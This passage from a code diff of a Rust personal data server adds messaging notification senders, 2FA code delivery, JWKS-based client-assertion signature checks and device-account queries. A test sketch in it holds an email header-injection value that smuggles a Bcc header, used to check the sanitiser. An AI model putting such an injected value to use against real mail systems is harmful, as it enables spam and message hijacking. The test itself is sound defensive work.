notification_service = notification_service.register_sender(telegram_sender);
66
+
}
67
+
68
+
if let Some(signal_sender) = SignalSender::from_env() {
69
+
info!("Signal notifications enabled");
70
+
notification_service = notification_service.register_sender(signal_sender);
71
+
}
72
+
73
+
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
74
+
75
+
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
76
+
let crawlers = Arc::new(
77
+
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
78
+
);
79
+
let firehose_rx = state.firehose_tx.subscribe();
80
+
info!("Crawlers notification service enabled");
81
+
Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx)))
82
+
} else {
83
+
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
84
+
None
85
+
};
86
87
let app = bspds::app(state);
88
···
97
.await;
98
99
notification_handle.await.ok();
100
+
if let Some(handle) = crawlers_handle {
101
+
handle.await.ok();
102
+
}
103
104
if let Err(e) = server_result {
105
return Err(format!("Server error: {}", e).into());
+7
-4
src/notifications/mod.rs
···
2
mod service;
3
mod types;
4
5
-
pub use sender::{EmailSender, NotificationSender};
6
pub use service::{
7
-
enqueue_account_deletion, enqueue_email_update, enqueue_email_verification,
8
-
enqueue_notification, enqueue_password_reset, enqueue_plc_operation, enqueue_welcome,
9
-
NotificationService,
10
};
11
pub use types::{
12
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
···
2
mod service;
3
mod types;
4
5
+
pub use sender::{
6
+
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
7
+
is_valid_phone_number, sanitize_header_value,
8
+
};
9
pub use service::{
10
+
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
11
+
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
12
+
enqueue_plc_operation, enqueue_welcome, NotificationService,
13
};
14
pub use types::{
15
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
+293
-4
src/notifications/sender.rs
···
1
use async_trait::async_trait;
2
use std::process::Stdio;
3
use tokio::io::AsyncWriteExt;
4
use tokio::process::Command;
5
6
use super::types::{NotificationChannel, QueuedNotification};
7
8
#[async_trait]
9
pub trait NotificationSender: Send + Sync {
···
24
25
#[error("External service error: {0}")]
26
ExternalService(String),
27
}
28
29
pub struct EmailSender {
···
47
Some(Self::new(from_address, from_name))
48
}
49
50
-
fn format_email(&self, notification: &QueuedNotification) -> String {
51
-
let subject = notification.subject.as_deref().unwrap_or("Notification");
52
let from_header = if self.from_name.is_empty() {
53
self.from_address.clone()
54
} else {
55
-
format!("{} <{}>", self.from_name, self.from_address)
56
};
57
58
format!(
59
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
60
from_header,
61
-
notification.recipient,
62
subject,
63
notification.body
64
)
···
96
Ok(())
97
}
98
}
···
1
use async_trait::async_trait;
2
+
use reqwest::Client;
3
+
use serde_json::json;
4
use std::process::Stdio;
5
+
use std::time::Duration;
6
use tokio::io::AsyncWriteExt;
7
use tokio::process::Command;
8
9
use super::types::{NotificationChannel, QueuedNotification};
10
+
11
+
const HTTP_TIMEOUT_SECS: u64 = 30;
12
+
const MAX_RETRIES: u32 = 3;
13
+
const INITIAL_RETRY_DELAY_MS: u64 = 500;
14
15
#[async_trait]
16
pub trait NotificationSender: Send + Sync {
···
31
32
#[error("External service error: {0}")]
33
ExternalService(String),
34
+
35
+
#[error("Invalid recipient format: {0}")]
36
+
InvalidRecipient(String),
37
+
38
+
#[error("Request timeout")]
39
+
Timeout,
40
+
41
+
#[error("Max retries exceeded: {0}")]
42
+
MaxRetriesExceeded(String),
43
+
}
44
+
45
+
fn create_http_client() -> Client {
46
+
Client::builder()
47
+
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
48
+
.connect_timeout(Duration::from_secs(10))
49
+
.build()
50
+
.unwrap_or_else(|_| Client::new())
51
+
}
52
+
53
+
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
54
+
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
55
+
}
56
+
57
+
async fn retry_delay(attempt: u32) {
58
+
let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
59
+
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
60
+
}
61
+
62
+
pub fn sanitize_header_value(value: &str) -> String {
63
+
value.replace(['\r', '\n'], " ").trim().to_string()
64
+
}
65
+
66
+
pub fn is_valid_phone_number(number: &str) -> bool {
67
+
if number.len() < 2 || number.len() > 20 {
68
+
return false;
69
+
}
70
+
let mut chars = number.chars();
71
+
if chars.next() != Some('+') {
72
+
return false;
73
+
}
74
+
let remaining: String = chars.collect();
75
+
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
76
}
77
78
pub struct EmailSender {
···
96
Some(Self::new(from_address, from_name))
97
}
98
99
+
pub fn format_email(&self, notification: &QueuedNotification) -> String {
100
+
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
101
+
let recipient = sanitize_header_value(&notification.recipient);
102
let from_header = if self.from_name.is_empty() {
103
self.from_address.clone()
104
} else {
105
+
format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address)
106
};
107
108
format!(
109
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
110
from_header,
111
+
recipient,
112
subject,
113
notification.body
114
)
···
146
Ok(())
147
}
148
}
149
+
150
+
pub struct DiscordSender {
151
+
webhook_url: String,
152
+
http_client: Client,
153
+
}
154
+
155
+
impl DiscordSender {
156
+
pub fn new(webhook_url: String) -> Self {
157
+
Self {
158
+
webhook_url,
159
+
http_client: create_http_client(),
160
+
}
161
+
}
162
+
163
+
pub fn from_env() -> Option<Self> {
164
+
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
165
+
Some(Self::new(webhook_url))
166
+
}
167
+
}
168
+
169
+
#[async_trait]
170
+
impl NotificationSender for DiscordSender {
171
+
fn channel(&self) -> NotificationChannel {
172
+
NotificationChannel::Discord
173
+
}
174
+
175
+
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
176
+
let subject = notification.subject.as_deref().unwrap_or("Notification");
177
+
let content = format!("**{}**\n\n{}", subject, notification.body);
178
+
179
+
let payload = json!({
180
+
"content": content,
181
+
"username": "BSPDS"
182
+
});
183
+
184
+
let mut last_error = None;
185
+
for attempt in 0..MAX_RETRIES {
186
+
let result = self
187
+
.http_client
188
+
.post(&self.webhook_url)
189
+
.json(&payload)
190
+
.send()
191
+
.await;
192
+
193
+
match result {
194
+
Ok(response) => {
195
+
if response.status().is_success() {
196
+
return Ok(());
197
+
}
198
+
199
+
let status = response.status();
200
+
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
201
+
last_error = Some(format!("Discord webhook returned {}", status));
202
+
retry_delay(attempt).await;
203
+
continue;
204
+
}
205
+
206
+
let body = response.text().await.unwrap_or_default();
207
+
return Err(SendError::ExternalService(format!(
208
+
"Discord webhook returned {}: {}",
209
+
status, body
210
+
)));
211
+
}
212
+
Err(e) => {
213
+
if e.is_timeout() {
214
+
if attempt < MAX_RETRIES - 1 {
215
+
last_error = Some(format!("Discord request timed out"));
216
+
retry_delay(attempt).await;
217
+
continue;
218
+
}
219
+
return Err(SendError::Timeout);
220
+
}
221
+
return Err(SendError::ExternalService(format!(
222
+
"Discord request failed: {}",
223
+
e
224
+
)));
225
+
}
226
+
}
227
+
}
228
+
229
+
Err(SendError::MaxRetriesExceeded(
230
+
last_error.unwrap_or_else(|| "Unknown error".to_string()),
231
+
))
232
+
}
233
+
}
234
+
235
+
pub struct TelegramSender {
236
+
bot_token: String,
237
+
http_client: Client,
238
+
}
239
+
240
+
impl TelegramSender {
241
+
pub fn new(bot_token: String) -> Self {
242
+
Self {
243
+
bot_token,
244
+
http_client: create_http_client(),
245
+
}
246
+
}
247
+
248
+
pub fn from_env() -> Option<Self> {
249
+
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
250
+
Some(Self::new(bot_token))
251
+
}
252
+
}
253
+
254
+
#[async_trait]
255
+
impl NotificationSender for TelegramSender {
256
+
fn channel(&self) -> NotificationChannel {
257
+
NotificationChannel::Telegram
258
+
}
259
+
260
+
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
261
+
let chat_id = &notification.recipient;
262
+
let subject = notification.subject.as_deref().unwrap_or("Notification");
263
+
let text = format!("*{}*\n\n{}", subject, notification.body);
264
+
265
+
let url = format!(
266
+
"https://api.telegram.org/bot{}/sendMessage",
267
+
self.bot_token
268
+
);
269
+
270
+
let payload = json!({
271
+
"chat_id": chat_id,
272
+
"text": text,
273
+
"parse_mode": "Markdown"
274
+
});
275
+
276
+
let mut last_error = None;
277
+
for attempt in 0..MAX_RETRIES {
278
+
let result = self
279
+
.http_client
280
+
.post(&url)
281
+
.json(&payload)
282
+
.send()
283
+
.await;
284
+
285
+
match result {
286
+
Ok(response) => {
287
+
if response.status().is_success() {
288
+
return Ok(());
289
+
}
290
+
291
+
let status = response.status();
292
+
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
293
+
last_error = Some(format!("Telegram API returned {}", status));
294
+
retry_delay(attempt).await;
295
+
continue;
296
+
}
297
+
298
+
let body = response.text().await.unwrap_or_default();
299
+
return Err(SendError::ExternalService(format!(
300
+
"Telegram API returned {}: {}",
301
+
status, body
302
+
)));
303
+
}
304
+
Err(e) => {
305
+
if e.is_timeout() {
306
+
if attempt < MAX_RETRIES - 1 {
307
+
last_error = Some(format!("Telegram request timed out"));
308
+
retry_delay(attempt).await;
309
+
continue;
310
+
}
311
+
return Err(SendError::Timeout);
312
+
}
313
+
return Err(SendError::ExternalService(format!(
314
+
"Telegram request failed: {}",
315
+
e
316
+
)));
317
+
}
318
+
}
319
+
}
320
+
321
+
Err(SendError::MaxRetriesExceeded(
322
+
last_error.unwrap_or_else(|| "Unknown error".to_string()),
323
+
))
324
+
}
325
+
}
326
+
327
+
pub struct SignalSender {
328
+
signal_cli_path: String,
329
+
sender_number: String,
330
+
}
331
+
332
+
impl SignalSender {
333
+
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
334
+
Self {
335
+
signal_cli_path,
336
+
sender_number,
337
+
}
338
+
}
339
+
340
+
pub fn from_env() -> Option<Self> {
341
+
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
342
+
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
343
+
let sender_number = std::env::var("SIGNAL_SENDER_NUMBER").ok()?;
344
+
Some(Self::new(signal_cli_path, sender_number))
345
+
}
346
+
}
347
+
348
+
#[async_trait]
349
+
impl NotificationSender for SignalSender {
350
+
fn channel(&self) -> NotificationChannel {
351
+
NotificationChannel::Signal
352
+
}
353
+
354
+
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
355
+
let recipient = &notification.recipient;
356
+
357
+
if !is_valid_phone_number(recipient) {
358
+
return Err(SendError::InvalidRecipient(format!(
359
+
"Invalid phone number format: {}",
360
+
recipient
361
+
)));
362
+
}
363
+
364
+
let subject = notification.subject.as_deref().unwrap_or("Notification");
365
+
let message = format!("{}\n\n{}", subject, notification.body);
366
+
367
+
let output = Command::new(&self.signal_cli_path)
368
+
.arg("-u")
369
+
.arg(&self.sender_number)
370
+
.arg("send")
371
+
.arg("-m")
372
+
.arg(&message)
373
+
.arg(recipient)
374
+
.output()
375
+
.await?;
376
+
377
+
if !output.status.success() {
378
+
let stderr = String::from_utf8_lossy(&output.stderr);
379
+
return Err(SendError::ExternalService(format!(
380
+
"signal-cli failed: {}",
381
+
stderr
382
+
)));
383
+
}
384
+
385
+
Ok(())
386
+
}
387
+
}
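The helpers above (`sanitize_header_value`, `is_valid_phone_number`) are pure functions, so they are cheap to pin down with tests; with MAX_RETRIES = 3 and INITIAL_RETRY_DELAY_MS = 500, `retry_delay` waits 500 ms after the first failed attempt and 1 s after the second, and the third attempt fails without a further wait. A minimal test sketch, assuming it sits alongside these helpers in the same file:

#[cfg(test)]
mod sender_helper_tests {
    use super::*;

    #[test]
    fn phone_numbers_require_plus_and_digits_only() {
        assert!(is_valid_phone_number("+12345678901"));
        assert!(!is_valid_phone_number("12345678901")); // missing leading '+'
        assert!(!is_valid_phone_number("+1 234 567"));  // whitespace is rejected
        assert!(!is_valid_phone_number("+"));           // no digits after '+'
    }

    #[test]
    fn header_values_drop_crlf() {
        // CR/LF must never survive into the generated email headers.
        let cleaned = sanitize_header_value("Subject\r\nBcc: attacker@example.com");
        assert!(!cleaned.contains('\r') && !cleaned.contains('\n'));
    }
}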
+36
src/notifications/service.rs
+36
src/notifications/service.rs
···
443
)
444
.await
445
}
446
+
447
+
pub async fn enqueue_2fa_code(
448
+
db: &PgPool,
449
+
user_id: Uuid,
450
+
code: &str,
451
+
hostname: &str,
452
+
) -> Result<Uuid, sqlx::Error> {
453
+
let prefs = get_user_notification_prefs(db, user_id).await?;
454
+
455
+
let body = format!(
456
+
"Hello @{},\n\nYour sign-in verification code is: {}\n\nThis code will expire in 10 minutes.\n\nIf you did not request this, please secure your account immediately.",
457
+
prefs.handle, code
458
+
);
459
+
460
+
enqueue_notification(
461
+
db,
462
+
NewNotification::new(
463
+
user_id,
464
+
prefs.channel,
465
+
super::types::NotificationType::TwoFactorCode,
466
+
prefs.email.clone(),
467
+
Some(format!("Sign-in Verification - {}", hostname)),
468
+
body,
469
+
),
470
+
)
471
+
.await
472
+
}
473
+
474
+
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
475
+
match channel {
476
+
NotificationChannel::Email => "email",
477
+
NotificationChannel::Discord => "Discord",
478
+
NotificationChannel::Telegram => "Telegram",
479
+
NotificationChannel::Signal => "Signal",
480
+
}
481
+
}
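A sketch of how `enqueue_2fa_code` and `channel_display_name` plausibly compose with the `two_factor_page` template added elsewhere in this change: the display names line up with the channel strings that template matches on. The handler shape and module paths are assumptions, not part of this diff:

// Hypothetical glue in the OAuth flow: queue the code, then render the prompt
// labelled with the channel it was sent on.
async fn prompt_for_code(
    db: &sqlx::PgPool,
    user_id: uuid::Uuid,
    code: &str,
    hostname: &str,
    request_uri: &str,
    channel: NotificationChannel,
) -> Result<String, sqlx::Error> {
    enqueue_2fa_code(db, user_id, code, hostname).await?;
    Ok(crate::oauth::templates::two_factor_page(
        request_uri,
        channel_display_name(channel),
        None,
    ))
}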
+1
src/notifications/types.rs
+1
src/notifications/types.rs
+267
-7
src/oauth/client.rs
+267
-7
src/oauth/client.rs
···
57
#[derive(Clone)]
58
pub struct ClientMetadataCache {
59
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
60
http_client: Client,
61
cache_ttl_secs: u64,
62
}
···
66
cached_at: std::time::Instant,
67
}
68
69
impl ClientMetadataCache {
70
pub fn new(cache_ttl_secs: u64) -> Self {
71
Self {
72
cache: Arc::new(RwLock::new(HashMap::new())),
73
-
http_client: Client::new(),
74
cache_ttl_secs,
75
}
76
}
···
101
Ok(metadata)
102
}
103
104
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
105
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
106
return Err(OAuthError::InvalidClient(
···
244
}
245
}
246
247
-
pub fn verify_client_auth(
248
metadata: &ClientMetadata,
249
client_auth: &super::ClientAuth,
250
) -> Result<(), OAuthError> {
···
258
)),
259
260
("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => {
261
-
verify_private_key_jwt(metadata, client_assertion)
262
}
263
264
("private_key_jwt", _) => Err(OAuthError::InvalidClient(
···
284
}
285
}
286
287
-
fn verify_private_key_jwt(
288
metadata: &ClientMetadata,
289
client_assertion: &str,
290
) -> Result<(), OAuthError> {
···
311
alg
312
)));
313
}
314
315
let payload_bytes = URL_SAFE_NO_PAD
316
.decode(parts[1])
···
353
}
354
}
355
356
-
if metadata.jwks.is_none() && metadata.jwks_uri.is_none() {
357
return Err(OAuthError::InvalidClient(
358
-
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
359
));
360
}
361
362
Err(OAuthError::InvalidClient(
363
-
"private_key_jwt signature verification not yet implemented - use 'none' auth method".to_string(),
364
))
365
}
···
57
#[derive(Clone)]
58
pub struct ClientMetadataCache {
59
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
60
+
jwks_cache: Arc<RwLock<HashMap<String, CachedJwks>>>,
61
http_client: Client,
62
cache_ttl_secs: u64,
63
}
···
67
cached_at: std::time::Instant,
68
}
69
70
+
struct CachedJwks {
71
+
jwks: serde_json::Value,
72
+
cached_at: std::time::Instant,
73
+
}
74
+
75
impl ClientMetadataCache {
76
pub fn new(cache_ttl_secs: u64) -> Self {
77
Self {
78
cache: Arc::new(RwLock::new(HashMap::new())),
79
+
jwks_cache: Arc::new(RwLock::new(HashMap::new())),
80
+
http_client: Client::builder()
81
+
.timeout(std::time::Duration::from_secs(30))
82
+
.connect_timeout(std::time::Duration::from_secs(10))
83
+
.build()
84
+
.unwrap_or_else(|_| Client::new()),
85
cache_ttl_secs,
86
}
87
}
···
112
Ok(metadata)
113
}
114
115
+
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
116
+
if let Some(jwks) = &metadata.jwks {
117
+
return Ok(jwks.clone());
118
+
}
119
+
120
+
let jwks_uri = metadata.jwks_uri.as_ref().ok_or_else(|| {
121
+
OAuthError::InvalidClient(
122
+
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
123
+
)
124
+
})?;
125
+
126
+
{
127
+
let cache = self.jwks_cache.read().await;
128
+
if let Some(cached) = cache.get(jwks_uri) {
129
+
if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
130
+
return Ok(cached.jwks.clone());
131
+
}
132
+
}
133
+
}
134
+
135
+
let jwks = self.fetch_jwks(jwks_uri).await?;
136
+
137
+
{
138
+
let mut cache = self.jwks_cache.write().await;
139
+
cache.insert(
140
+
jwks_uri.clone(),
141
+
CachedJwks {
142
+
jwks: jwks.clone(),
143
+
cached_at: std::time::Instant::now(),
144
+
},
145
+
);
146
+
}
147
+
148
+
Ok(jwks)
149
+
}
150
+
151
+
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
152
+
if !jwks_uri.starts_with("https://") {
153
+
if !jwks_uri.starts_with("http://")
154
+
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))
155
+
{
156
+
return Err(OAuthError::InvalidClient(
157
+
"jwks_uri must use https (except for localhost)".to_string(),
158
+
));
159
+
}
160
+
}
161
+
162
+
let response = self
163
+
.http_client
164
+
.get(jwks_uri)
165
+
.header("Accept", "application/json")
166
+
.send()
167
+
.await
168
+
.map_err(|e| {
169
+
OAuthError::InvalidClient(format!("Failed to fetch JWKS from {}: {}", jwks_uri, e))
170
+
})?;
171
+
172
+
if !response.status().is_success() {
173
+
return Err(OAuthError::InvalidClient(format!(
174
+
"Failed to fetch JWKS: HTTP {}",
175
+
response.status()
176
+
)));
177
+
}
178
+
179
+
let jwks: serde_json::Value = response
180
+
.json()
181
+
.await
182
+
.map_err(|e| OAuthError::InvalidClient(format!("Invalid JWKS JSON: {}", e)))?;
183
+
184
+
if jwks.get("keys").and_then(|k| k.as_array()).is_none() {
185
+
return Err(OAuthError::InvalidClient(
186
+
"JWKS must contain a 'keys' array".to_string(),
187
+
));
188
+
}
189
+
190
+
Ok(jwks)
191
+
}
192
+
193
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
194
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
195
return Err(OAuthError::InvalidClient(
···
333
}
334
}
335
336
+
pub async fn verify_client_auth(
337
+
cache: &ClientMetadataCache,
338
metadata: &ClientMetadata,
339
client_auth: &super::ClientAuth,
340
) -> Result<(), OAuthError> {
···
348
)),
349
350
("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => {
351
+
verify_private_key_jwt_async(cache, metadata, client_assertion).await
352
}
353
354
("private_key_jwt", _) => Err(OAuthError::InvalidClient(
···
374
}
375
}
376
377
+
async fn verify_private_key_jwt_async(
378
+
cache: &ClientMetadataCache,
379
metadata: &ClientMetadata,
380
client_assertion: &str,
381
) -> Result<(), OAuthError> {
···
402
alg
403
)));
404
}
405
+
406
+
let kid = header.get("kid").and_then(|k| k.as_str());
407
408
let payload_bytes = URL_SAFE_NO_PAD
409
.decode(parts[1])
···
446
}
447
}
448
449
+
let jwks = cache.get_jwks(metadata).await?;
450
+
let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| {
451
+
OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string())
452
+
})?;
453
+
454
+
let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid {
455
+
keys.iter()
456
+
.filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid))
457
+
.collect()
458
+
} else {
459
+
keys.iter().collect()
460
+
};
461
+
462
+
if matching_keys.is_empty() {
463
return Err(OAuthError::InvalidClient(
464
+
"No matching key found in client JWKS".to_string(),
465
));
466
}
467
468
+
let signing_input = format!("{}.{}", parts[0], parts[1]);
469
+
let signature_bytes = URL_SAFE_NO_PAD
470
+
.decode(parts[2])
471
+
.map_err(|_| OAuthError::InvalidClient("Invalid signature encoding".to_string()))?;
472
+
473
+
for key in matching_keys {
474
+
let key_alg = key.get("alg").and_then(|a| a.as_str());
475
+
if key_alg.is_some() && key_alg != Some(alg) {
476
+
continue;
477
+
}
478
+
479
+
let kty = key.get("kty").and_then(|k| k.as_str()).unwrap_or("");
480
+
481
+
let verified = match (alg, kty) {
482
+
("ES256", "EC") => verify_es256(key, &signing_input, &signature_bytes),
483
+
("ES384", "EC") => verify_es384(key, &signing_input, &signature_bytes),
484
+
("RS256" | "RS384" | "RS512", "RSA") => {
485
+
verify_rsa(alg, key, &signing_input, &signature_bytes)
486
+
}
487
+
("EdDSA", "OKP") => verify_eddsa(key, &signing_input, &signature_bytes),
488
+
_ => continue,
489
+
};
490
+
491
+
if verified.is_ok() {
492
+
return Ok(());
493
+
}
494
+
}
495
+
496
Err(OAuthError::InvalidClient(
497
+
"client_assertion signature verification failed".to_string(),
498
+
))
499
+
}
500
+
501
+
fn verify_es256(
502
+
key: &serde_json::Value,
503
+
signing_input: &str,
504
+
signature: &[u8],
505
+
) -> Result<(), OAuthError> {
506
+
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
507
+
use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier};
508
+
use p256::EncodedPoint;
509
+
510
+
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
511
+
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
512
+
})?;
513
+
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
514
+
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
515
+
})?;
516
+
517
+
let x_bytes = URL_SAFE_NO_PAD.decode(x)
518
+
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
519
+
let y_bytes = URL_SAFE_NO_PAD.decode(y)
520
+
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
521
+
522
+
let mut point_bytes = vec![0x04];
523
+
point_bytes.extend_from_slice(&x_bytes);
524
+
point_bytes.extend_from_slice(&y_bytes);
525
+
526
+
let point = EncodedPoint::from_bytes(&point_bytes)
527
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
528
+
let verifying_key = VerifyingKey::from_encoded_point(&point)
529
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
530
+
531
+
let sig = Signature::from_slice(signature)
532
+
.map_err(|_| OAuthError::InvalidClient("Invalid ES256 signature format".to_string()))?;
533
+
534
+
verifying_key
535
+
.verify(signing_input.as_bytes(), &sig)
536
+
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
537
+
}
538
+
539
+
fn verify_es384(
540
+
key: &serde_json::Value,
541
+
signing_input: &str,
542
+
signature: &[u8],
543
+
) -> Result<(), OAuthError> {
544
+
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
545
+
use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier};
546
+
use p384::EncodedPoint;
547
+
548
+
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
549
+
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
550
+
})?;
551
+
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
552
+
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
553
+
})?;
554
+
555
+
let x_bytes = URL_SAFE_NO_PAD.decode(x)
556
+
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
557
+
let y_bytes = URL_SAFE_NO_PAD.decode(y)
558
+
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
559
+
560
+
let mut point_bytes = vec![0x04];
561
+
point_bytes.extend_from_slice(&x_bytes);
562
+
point_bytes.extend_from_slice(&y_bytes);
563
+
564
+
let point = EncodedPoint::from_bytes(&point_bytes)
565
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
566
+
let verifying_key = VerifyingKey::from_encoded_point(&point)
567
+
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
568
+
569
+
let sig = Signature::from_slice(signature)
570
+
.map_err(|_| OAuthError::InvalidClient("Invalid ES384 signature format".to_string()))?;
571
+
572
+
verifying_key
573
+
.verify(signing_input.as_bytes(), &sig)
574
+
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
575
+
}
576
+
577
+
fn verify_rsa(
578
+
_alg: &str,
579
+
_key: &serde_json::Value,
580
+
_signing_input: &str,
581
+
_signature: &[u8],
582
+
) -> Result<(), OAuthError> {
583
+
Err(OAuthError::InvalidClient(
584
+
"RSA signature verification not yet supported - use EC keys".to_string(),
585
))
586
}
587
+
588
+
fn verify_eddsa(
589
+
key: &serde_json::Value,
590
+
signing_input: &str,
591
+
signature: &[u8],
592
+
) -> Result<(), OAuthError> {
593
+
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
594
+
use ed25519_dalek::{Signature, Verifier, VerifyingKey};
595
+
596
+
let crv = key.get("crv").and_then(|c| c.as_str()).unwrap_or("");
597
+
if crv != "Ed25519" {
598
+
return Err(OAuthError::InvalidClient(format!(
599
+
"Unsupported EdDSA curve: {}",
600
+
crv
601
+
)));
602
+
}
603
+
604
+
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
605
+
OAuthError::InvalidClient("Missing x in OKP key".to_string())
606
+
})?;
607
+
608
+
let x_bytes = URL_SAFE_NO_PAD.decode(x)
609
+
.map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?;
610
+
611
+
let key_bytes: [u8; 32] = x_bytes.try_into()
612
+
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?;
613
+
614
+
let verifying_key = VerifyingKey::from_bytes(&key_bytes)
615
+
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?;
616
+
617
+
let sig_bytes: [u8; 64] = signature.try_into()
618
+
.map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?;
619
+
620
+
let sig = Signature::from_bytes(&sig_bytes);
621
+
622
+
verifying_key
623
+
.verify(signing_input.as_bytes(), &sig)
624
+
.map_err(|_| OAuthError::InvalidClient("EdDSA signature verification failed".to_string()))
625
+
}
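Because `verify_client_auth` is now async and takes the metadata cache (so private_key_jwt clients can have their `jwks_uri` fetched and cached with the same TTL as metadata), call sites change shape roughly as below; the wrapper and the import paths are assumptions for illustration:

// Call-site sketch; how the cache reaches this point is up to the caller.
async fn check_client(
    cache: &ClientMetadataCache,
    metadata: &ClientMetadata,
    client_auth: &crate::oauth::ClientAuth,
) -> Result<(), OAuthError> {
    // Now async: the private_key_jwt branch may need a network fetch of the
    // client's JWKS, which goes through the shared jwks_cache.
    verify_client_auth(cache, metadata, client_auth).await
}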
+62
src/oauth/db/device.rs
+62
src/oauth/db/device.rs
···
1
+
use chrono::{DateTime, Utc};
2
use sqlx::PgPool;
3
4
use super::super::{DeviceData, OAuthError};
5
+
6
+
pub struct DeviceAccountRow {
7
+
pub did: String,
8
+
pub handle: String,
9
+
pub email: String,
10
+
pub last_used_at: DateTime<Utc>,
11
+
}
12
13
pub async fn create_device(
14
pool: &PgPool,
···
102
103
Ok(())
104
}
105
+
106
+
pub async fn get_device_accounts(
107
+
pool: &PgPool,
108
+
device_id: &str,
109
+
) -> Result<Vec<DeviceAccountRow>, OAuthError> {
110
+
let rows = sqlx::query!(
111
+
r#"
112
+
SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at
113
+
FROM oauth_account_device ad
114
+
JOIN users u ON u.did = ad.did
115
+
WHERE ad.device_id = $1
116
+
AND u.deactivated_at IS NULL
117
+
AND u.takedown_ref IS NULL
118
+
ORDER BY ad.updated_at DESC
119
+
"#,
120
+
device_id
121
+
)
122
+
.fetch_all(pool)
123
+
.await?;
124
+
125
+
Ok(rows
126
+
.into_iter()
127
+
.map(|r| DeviceAccountRow {
128
+
did: r.did,
129
+
handle: r.handle,
130
+
email: r.email,
131
+
last_used_at: r.last_used_at,
132
+
})
133
+
.collect())
134
+
}
135
+
136
+
pub async fn verify_account_on_device(
137
+
pool: &PgPool,
138
+
device_id: &str,
139
+
did: &str,
140
